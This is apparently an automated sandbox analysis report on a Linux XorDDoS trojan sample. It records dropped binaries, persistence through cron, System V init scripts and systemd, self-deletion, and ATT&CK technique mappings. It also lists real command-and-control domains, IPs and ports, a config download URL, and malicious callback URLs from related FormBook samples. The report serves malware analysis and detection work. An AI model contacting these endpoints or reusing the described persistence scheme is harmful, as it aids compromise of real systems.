            Source: .depend.boot.18.drBinary or memory string: TARGETS = console-setup resolvconf alsa-utils mountkernfs.sh ufw plymouth-log hostname.sh lm-sensors screen-cleanup pppd-dns apparmor x11-common udev keyboard-setup mountdevsubfs.sh brltty procps qemu-kvm cryptdisks cryptdisks-early hwclock.sh open-iscsi networking iscsid checkroot.sh lvm2 urandom checkfs.sh mountall.sh mountall-bootclean.sh bootmisc.sh kmod mountnfs.sh checkroot-bootclean.sh mountnfs-bootclean.sh

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: iJl2Sb6qRa, type: SAMPLE
            Source: Yara matchFile source: 9750.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10071.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10181.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10423.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9904.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10445.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10159.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9684.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10412.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9761.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9838.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9607.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9772.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10148.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10280.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10291.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9948.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9662.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10346.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9739.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10093.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10104.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9462.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10005.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9454.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10016.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9651.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9629.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9585.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9959.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10269.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10258.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9816.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10324.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9563.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9926.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9871.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10247.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10115.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10214.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9596.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10192.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9794.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9695.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10390.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9706.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10137.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9640.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9552.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9457.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10379.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9915.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9728.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10082.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10313.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9937.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10060.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9882.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9827.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9893.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10038.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9849.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10203.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9970.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10126.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10357.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9783.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10335.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10049.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9994.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10302.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9673.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10236.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10170.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9717.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9618.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9805.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9574.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9451.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9981.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 9860.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10434.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10368.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10401.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10027.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 10225.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9451, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9454, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9457, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9462, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9552, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9563, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9574, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9585, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9596, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9607, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9618, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9629, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9640, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9651, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9662, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9673, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9684, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9695, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9706, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9717, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9728, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9739, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9750, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9761, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9772, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9783, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9794, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9805, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9816, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9827, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9838, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9849, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9860, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9871, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9882, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9893, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9904, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9915, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9926, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9937, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9948, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9959, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9970, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9981, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 9994, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 10005, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 10016, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 10027, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 10038, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 10049, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iJl2Sb6qRa PID: 10060, type: MEMORYSTR
            Source: Yara matchFile source: /lib/libudev.so, type: DROPPED
            Source: Yara matchFile source: /usr/bin/wzhmvohlxs, type: DROPPED
            Source: Yara matchFile source: /usr/bin/hiueshutol, type: DROPPED
            Source: Yara matchFile source: /usr/bin/mhvrcmaysv, type: DROPPED
            Source: Yara matchFile source: /usr/bin/lnmgbribvb, type: DROPPED
            Source: Yara matchFile source: /usr/bin/hgfzmygnbx, type: DROPPED
            Source: Yara matchFile source: /usr/bin/wdcujvrbpo, type: DROPPED
            Source: Yara matchFile source: /usr/bin/dezqblvxuy, type: DROPPED
            Source: Yara matchFile source: /usr/bin/chdmwyeiia, type: DROPPED
            Source: Yara matchFile source: /usr/bin/ckxgqrmzxa, type: DROPPED
            Source: Yara matchFile source: /usr/bin/lsodknzpps, type: DROPPED
            Source: Yara matchFile source: /usr/bin/eoqlmyvucn, type: DROPPED
            Source: Yara matchFile source: /usr/bin/cjfywultqo, type: DROPPED
            Source: Yara matchFile source: /usr/bin/zbksjhrfms, type: DROPPED
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts1
            Scripting
            1
            Systemd Service
            1
            Systemd Service
            11
            Masquerading
            1
            OS Credential Dumping
            11
            Security Software Discovery
            Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
            Non-Standard Port
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default Accounts2
            At (Linux)
            2
            At (Linux)
            2
            At (Linux)
            1
            Scripting
            LSASS Memory2
            System Information Discovery
            Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
            Non-Application Layer Protocol
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
            File Deletion
            Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
            Application Layer Protocol
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer1
            Ingress Tool Transfer
            SIM Card SwapCarrier Billing Fraud
            {"C2 list": ["http://aa.hostasa.org/config.rar\u0000tat456.com:1522", "ppp.gggatat456.com:1522"]}
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Number of created Files
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 841187 Sample: iJl2Sb6qRa Startdate: 04/04/2023 Architecture: LINUX Score: 100 77 ppp.gggatat456.com 54.36.145.106, 1522, 46434 OVHFR France 2->77 79 aa.hostasa.org 199.59.243.223, 55892, 80 BODIS-NJUS United States 2->79 81 Snort IDS alert for network traffic 2->81 83 Malicious sample detected (through community Yara rule) 2->83 85 Antivirus detection for dropped file 2->85 87 4 other signatures 2->87 10 iJl2Sb6qRa 2->10         started        signatures3 process4 process5 12 iJl2Sb6qRa 10->12         started        file6 69 /usr/bin/zbksjhrfms, ELF 12->69 dropped 71 /usr/bin/wzhmvohlxs, ELF 12->71 dropped 73 /usr/bin/wdcujvrbpo, ELF 12->73 dropped 75 14 other malicious files 12->75 dropped 99 Drops files in suspicious directories 12->99 101 Sample deletes itself 12->101 103 Sample tries to persist itself using cron 12->103 105 Sample tries to persist itself using System V runlevels 12->105 16 iJl2Sb6qRa 12->16         started        18 iJl2Sb6qRa dash 12->18         started        22 iJl2Sb6qRa 12->22         started        24 155 other processes 12->24 signatures7 process8 file9 26 iJl2Sb6qRa update-rc.d 16->26         started        61 /etc/crontab, ASCII 18->61 dropped 89 Sample tries to persist itself using cron 18->89 28 dash sed 18->28         started        31 iJl2Sb6qRa lsodknzpps 22->31         started        33 iJl2Sb6qRa lsodknzpps 24->33         started        35 iJl2Sb6qRa lsodknzpps 24->35         started        37 iJl2Sb6qRa lsodknzpps 24->37         started        39 152 other processes 24->39 signatures10 process11 signatures12 41 update-rc.d insserv 26->41         started        45 update-rc.d systemctl 26->45         started        97 Sample tries to persist itself using cron 28->97 47 lsodknzpps 31->47         started        49 lsodknzpps 33->49         started        51 lsodknzpps 35->51         started        53 lsodknzpps 37->53         started        55 lsodknzpps 39->55         started        57 cjfywultqo 39->57         started        59 149 other processes 39->59 process13 file14 63 /etc/init.d/.depend.stop, ASCII 41->63 dropped 65 /etc/init.d/.depend.start, ASCII 41->65 dropped 67 /etc/init.d/.depend.boot, ASCII 41->67 dropped 91 Drops files in suspicious directories 41->91 93 Sample tries to persist itself using System V runlevels 41->93 95 Sample deletes itself 47->95 signatures15
            SourceDetectionScannerLabelLink
            iJl2Sb6qRa68%ReversingLabsLinux.Network.XorDDoS
            iJl2Sb6qRa66%VirustotalBrowse
            iJl2Sb6qRa100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            /usr/bin/emnaztxelb100%AviraLINUX/Xorddos.ygevo
            /usr/bin/wzhmvohlxs100%Joe Sandbox ML
            /usr/bin/cjfywultqo100%Joe Sandbox ML
            /usr/bin/emnaztxelb100%Joe Sandbox ML
            /usr/bin/zbksjhrfms100%Joe Sandbox ML
            /usr/bin/mhvrcmaysv100%Joe Sandbox ML
            /lib/libudev.so100%Joe Sandbox ML
            /usr/bin/wdcujvrbpo100%Joe Sandbox ML
            /usr/bin/eoqlmyvucn100%Joe Sandbox ML
            /usr/bin/dezqblvxuy100%Joe Sandbox ML
            /usr/bin/hgfzmygnbx100%Joe Sandbox ML
            /usr/bin/hiueshutol100%Joe Sandbox ML
            /usr/bin/chdmwyeiia100%Joe Sandbox ML
            /usr/bin/lnmgbribvb100%Joe Sandbox ML
            /usr/bin/ckxgqrmzxa100%Joe Sandbox ML
            /usr/bin/lsodknzpps100%Joe Sandbox ML
            /etc/cron.hourly/gcc.sh28%ReversingLabsLinux.Trojan.XorDDoS
            /lib/libudev.so68%ReversingLabsLinux.Network.XorDDoS
            /usr/bin/emnaztxelb17%ReversingLabsLinux.Network.Xor
            SourceDetectionScannerLabelLink
            ppp.gggatat456.com13%VirustotalBrowse
            aa.hostasa.org12%VirustotalBrowse
            SourceDetectionScannerLabelLink
            ppp.gggatat456.com:1522100%Avira URL Cloudmalware
            http://aa.hostasa.org/config.rar100%Avira URL Cloudmalware
            http://aa.hostasa.org/config.rartat456.com:1522100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            ppp.gggatat456.com
            54.36.145.106
            truetrueunknown
            aa.hostasa.org
            199.59.243.223
            truetrueunknown
            NameMaliciousAntivirus DetectionReputation
            http://aa.hostasa.org/config.rartrue
            • Avira URL Cloud: malware
            unknown
            http://aa.hostasa.org/config.rartat456.com:1522true
            • Avira URL Cloud: malware
            unknown
            ppp.gggatat456.com:1522true
            • Avira URL Cloud: malware
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://www.google.comiJl2Sb6qRa, 9552.1.0000000008e7b000.0000000008e9c000.rw-.sdmp, iJl2Sb6qRa, 9563.1.0000000008e7b000.0000000008e9c000.rw-.sdmpfalse
              high
              http://www.gnu.org/software/libc/bugs.htmliJl2Sb6qRa, wzhmvohlxs.7.dr, cjfywultqo.7.dr, zbksjhrfms.7.dr, mhvrcmaysv.7.dr, libudev.so.7.dr, wdcujvrbpo.7.dr, eoqlmyvucn.7.dr, dezqblvxuy.7.dr, hgfzmygnbx.7.dr, hiueshutol.7.dr, chdmwyeiia.7.dr, lnmgbribvb.7.dr, ckxgqrmzxa.7.dr, lsodknzpps.7.drfalse
                high
                http://aa.hostasa.org/config.rartat456.com:1522iJl2Sb6qRa, 9451.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9454.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9457.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9462.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9552.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9563.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9574.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9585.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9596.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9607.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9618.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9629.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9640.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9651.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9662.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9673.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9684.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9695.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9706.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9717.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9728.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmpfalse
                • Avira URL Cloud: malware
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                199.59.243.223
                aa.hostasa.orgUnited States
                395082BODIS-NJUStrue
                54.36.145.106
                ppp.gggatat456.comFrance
                16276OVHFRtrue
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                199.59.243.223SecuriteInfo.com.Variant.Babar.161191.3845.26747.exeGet hashmaliciousFormBookBrowse
                • www.brandbenefitplaybook.com/d82s/?1EIysb=EWoZ&10f=hZymMWi8OIpcvwrq+yvgylp3rZSyTuKi7aUoMF0D4T525J6S8xrli2or7uKJzNj4i4UTIdpwu3zJDJUSoFjqT45bX7IdlJUbmQ==
                nsg5uov8KS.exeGet hashmaliciousFormBookBrowse
                • www.brandbenefitplaybook.com/npd2/?V99=xTNX35RgV2Vh5y+G2fR7vi+M5aQ5m1G8qKcD6Gc4Uv6uCgtW2sniqqX6ZuWOd27sZ3PQhU3BDXPlNMtFbiQi0Y2Z/X1XGLi4ag==&Ym1=FRuIj
                led_cmds.exeGet hashmaliciousUnknownBrowse
                • h1.ripway.com/sdb00050/setting.ini
                system3_.exeGet hashmaliciousUnknownBrowse
                • h1.ripway.com/sdb00050/setting.ini
                modules.exeGet hashmaliciousUnknownBrowse
                • h1.ripway.com/sdb00050/setting.ini
                file.exeGet hashmaliciousFormBook, PlayBrowse
                • www.pointman.us/g2fg/?4hcPZDI=1ZbWzwWBWxEdGhy/e82kp5544c8o4bU6/C/4k5IuQdOu/iNANdrsX0vcj9fJurvqheTccFw6SQ==&5jO8=DFNPA2
                Quotation.exeGet hashmaliciousFormBook, PlayBrowse
                • www.macmedicrepairs.co.uk/gp8u/?uv9=hSR/tCoT8hHBkIaqubFAVGjyBiHPaNULdPNwgzle7vIh+/7EWbIM+YqAen3SD8dJbyktpYUrVXqoAuBEs2m8Vu9CVfQn9o2pXQ==&UTACh=_JfvH1eSpT
                rBillOfQuantity.exeGet hashmaliciousFormBook, PlayBrowse
                • www.englishsongs.online/jr22/?6l=vuC9WrwZzaft5wQPdsJ9DwyF8vmbJmHwaeUvChuVq1w0skLPtiZNko0q8HEaPBveCAO4&k67TO=3fUlj4
                ORDER_NOTIFICATION_pdf.exeGet hashmaliciousFormBook, PlayBrowse
                • www.192exchange.com/u5rs/?ST0x-=V6fqq&5No=tOWjj3FeIBVa7p90xwPxeRATz1E38Fj7HQAlNpBqOWrq90TjlLUP8u7nzYDbkXbeRKNjZReZY+YssjdiGYq3pamYnpi+rxcrnw==
                Specifications.exeGet hashmaliciousFormBook, PlayBrowse
                • www.bimeyes.com/lf80/?jsON=fVXesP&RB=hU9hUyFyor7oqDBCHcmc4+FchluUI7/Y5cDxSzUspsL7W3t0RoYhUWyy6sdd1Eh9/U+YV96YTX7baYjLWAzCxjcH3fxBN54S2gZeEhxCbEbu
                NiNjector.exeGet hashmaliciousLuca Stealer, Rusty Stealer, XmrigBrowse
                • ww25.files.zerobytez.xyz/iversion.txt?subid1=20230329-1552-265c-b54f-75c0d8630e64
                Invoice.exeGet hashmaliciousFormBookBrowse
                • www.192exchange.com/cz5n/?dtmX=sixtQWidSTSxGO51TCGh8sp1YomJtzaBir6XCsRB79BaMvvCo7B3qN8D1XhQvE/wsY3ZBtw9YYJxGtKl3M5ybLLq2LHto5fSEg==&ZTN=4rscfjM9BwPP
                Scientize.exeGet hashmaliciousFormBook, GuLoaderBrowse
                • www.cartracker.store/qjrd/?33x=8jZJUA7Vq8O/DdyumrhpVnDEm0/P/jE/GLkXquz2m9aZ00hmlmBez7Tjh+fwG+Zt7l4Vv8xlP+fYgYxkBtvqY5i+O+O6SV84cA==&eg8JW_=3wDLr
                Dissensers.exeGet hashmaliciousFormBook, GuLoaderBrowse
                • www.cartracker.store/qjrd/?IMmk=8jZJUA7Vq8O/DdyumrhpVnDEm0/P/jE/GLkXquz2m9aZ00hmlmBez7Tjh+fwG+Zt7l4Vv8xlP+fYgYxkBtvqY5i+O+O6SV84cA==&WAZN2=jtS0S7yENCzsUO
                32AC0624A534A2C40FB8EBA41E80BB1D31B99CD118D42.exeGet hashmaliciousFFDroider, ManusCrypt, Nitol, PrivateLoader, SmokeLoader, SocelarsBrowse
                • ww25.listincode.com/?subid1=20230327-1817-2264-ae5b-a3ddd52a1144
                XBAo84Asbf.exeGet hashmaliciousFormBookBrowse
                • www.watsonwindow.com/jr22/?DX6pO=CpKpdfR&3fcLj=p7LnA046D/tJFaGJkr9UCUw9sKN7iJwXLzW4LELm4l9fHtkcqDl/d4PNA203FE90gGqM
                https://workflowy.com/s/provident-constructi/6eFbKO3TcHp1BNGsGet hashmaliciousHTMLPhisherBrowse
                • ww1.mcl.com/_tr
                rquotationorda.exeGet hashmaliciousFormBookBrowse
                • www.apollobenfitservices.com/n13e/?y0DH=7I46PhRl6kstEe4R9y0xglygEtYT0Bn6/qq3TCfBxGrmEgYQFUbTuxvXcK4/adRK7CpK&ER-T=3frLULJ
                Return_Slip.exeGet hashmaliciousFormBookBrowse
                • www.macmedicrepairs.co.uk/gp8u/?FH_x4Ur=hSR/tCoT8hHBkIaqubFAVGjyBiHPaNULdPNwgzle7vIh+/7EWbIM+YqAen3SD8dJbyktpYUrVXqoAuBEs2mxPeJgRfgV6deiBAQsOr56fYR+&RN6cKe=XUk1GKFX6
                Shipping_documents.exeGet hashmaliciousFormBookBrowse
